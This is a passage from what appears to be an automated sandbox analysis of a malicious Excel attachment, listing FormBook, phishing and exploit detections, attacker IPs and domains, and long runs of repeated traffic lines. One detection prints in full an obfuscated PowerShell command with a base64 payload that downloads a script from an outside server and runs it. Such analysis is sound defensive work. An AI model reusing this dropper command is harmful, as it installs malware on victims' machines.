AgICAgI
              Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3780, TargetFilename: C:\Users\user\AppData\Local\Temp\hlhaxm2c.jzx.ps1

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3780, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline", ProcessId: 3888, ProcessName: csc.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T07:28:52.588083+010020241971A Network Trojan was detected172.245.123.1280192.168.2.2249164TCP
              2024-12-02T07:28:57.061460+010020241971A Network Trojan was detected172.245.123.1280192.168.2.2249166TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T07:28:52.588027+010020244491Attempted User Privilege Gain192.168.2.2249164172.245.123.1280TCP
              2024-12-02T07:28:57.061249+010020244491Attempted User Privilege Gain192.168.2.2249166172.245.123.1280TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T07:29:15.119447+010020490381A Network Trojan was detected142.215.209.77443192.168.2.2249168TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T07:29:03.465056+010028587951A Network Trojan was detected192.168.2.2249167172.245.123.1280TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: PI-02911202409#.xla.xlsxVirustotal: Detection: 9%Perma Link
              Yara detected FormBook
              Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Machine Learning detection for sample
              Source: PI-02911202409#.xla.xlsxJoe Sandbox ML: detected

              Phishing

              barindex
              Yara detected HtmlPhish44
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestgoodluckthings[1].hta, type: DROPPED
              Source: unknownHTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49168 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49163 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49165 version: TLS 1.2
              Source: Binary string: .pdb| source: powershell.exe, 00000008.00000002.512809894.000000001C109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.pdb source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.pdbhP source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Document exploit detected (process start blacklist hit)
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: global trafficDNS query: name: linkjago.me
              Source: global trafficDNS query: name: linkjago.me
              Source: global trafficDNS query: name: linkjago.me
              Source: global trafficDNS query: name: linkjago.me
              Source: global trafficDNS query: name: linkjago.me
              Source: global trafficDNS query: name: 1016.filemail.com
              Source: global trafficDNS query: name: 1016.filemail.com
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
